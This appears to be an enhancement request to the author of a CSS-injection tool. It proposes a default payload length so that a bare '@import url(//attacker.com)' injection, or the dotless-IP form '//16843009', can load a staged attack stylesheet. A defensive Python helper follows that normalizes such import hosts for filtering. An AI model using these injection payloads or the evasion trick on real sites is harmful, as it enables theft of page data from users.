Hey d0nut, here's another enhancement request.
Since we're specifying `charset` on the command line, why not also allow specifying a default staging `len` value? This way, if no path is specified, a targeted payload could still be delivered.
For example if we could only inject (assuming protocol relative url support):
```css
@import url(//attacker.com)
```
Then a payload could be generated using whatever `len` argument was specified via the command line (a sensible default, like 12, could be assumed if none is provided via URL or CLI).
This would have the advantage of limiting the characters required for successful injection to only `().a-z/`. This could be reduced further to just `()0-9/` using a dotless IP:
```css
@import url(//16843009)
```
Wouldn't that be cool?
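Added example from the defender's side, not part of this request or of the tool: a small Python helper that pulls the host out of every `@import url(...)` rule and normalizes the dotless decimal form mentioned above to dotted-quad, so a CSS filter or log review compares `//16843009` and `//1.1.1.1` as the same host. The sample stylesheet is constructed; `example.org` is a placeholder.

```python
import ipaddress
import re

# Matches "@import url(...)" with an optional quoted URL, case-insensitively.
IMPORT_RE = re.compile(
    r"@import\s+url\(\s*['\"]?([^'\")\s]+)['\"]?\s*\)", re.IGNORECASE
)


def normalize_host(host: str) -> str:
    """Return a dotless (decimal) IPv4 host as dotted-quad; other hosts unchanged.

    Browsers resolve a bare decimal host such as 16843009 as 1.1.1.1, so a
    filter that only knows the dotted form would miss it without this step.
    """
    if host.isdigit():
        value = int(host)
        if value <= 0xFFFFFFFF:
            return str(ipaddress.IPv4Address(value))
    return host


def extract_import_hosts(css: str) -> list[tuple[str, str, bool]]:
    """Return (raw_url, normalized_host, is_protocol_relative) per @import rule."""
    results = []
    for match in IMPORT_RE.finditer(css):
        raw = match.group(1)
        protocol_relative = raw.startswith("//")
        # Drop any scheme and leading slashes, then cut at the first
        # path, port, query or fragment separator to isolate the host.
        no_scheme = re.sub(r"^[a-z][a-z0-9+.-]*:", "", raw, flags=re.IGNORECASE)
        host = re.split(r"[/:?#]", no_scheme.lstrip("/"), maxsplit=1)[0]
        results.append((raw, normalize_host(host), protocol_relative))
    return results


# Constructed sample stylesheet covering the two forms from the request
# plus an ordinary absolute import.
SAMPLE_CSS = """
@import url(//16843009);
@import url(//attacker.com);
@import url(https://example.org/style.css);
"""

if __name__ == "__main__":
    for raw, host, rel in extract_import_hosts(SAMPLE_CSS):
        print(f"{raw!r:40} host={host:15} protocol_relative={rel}")
```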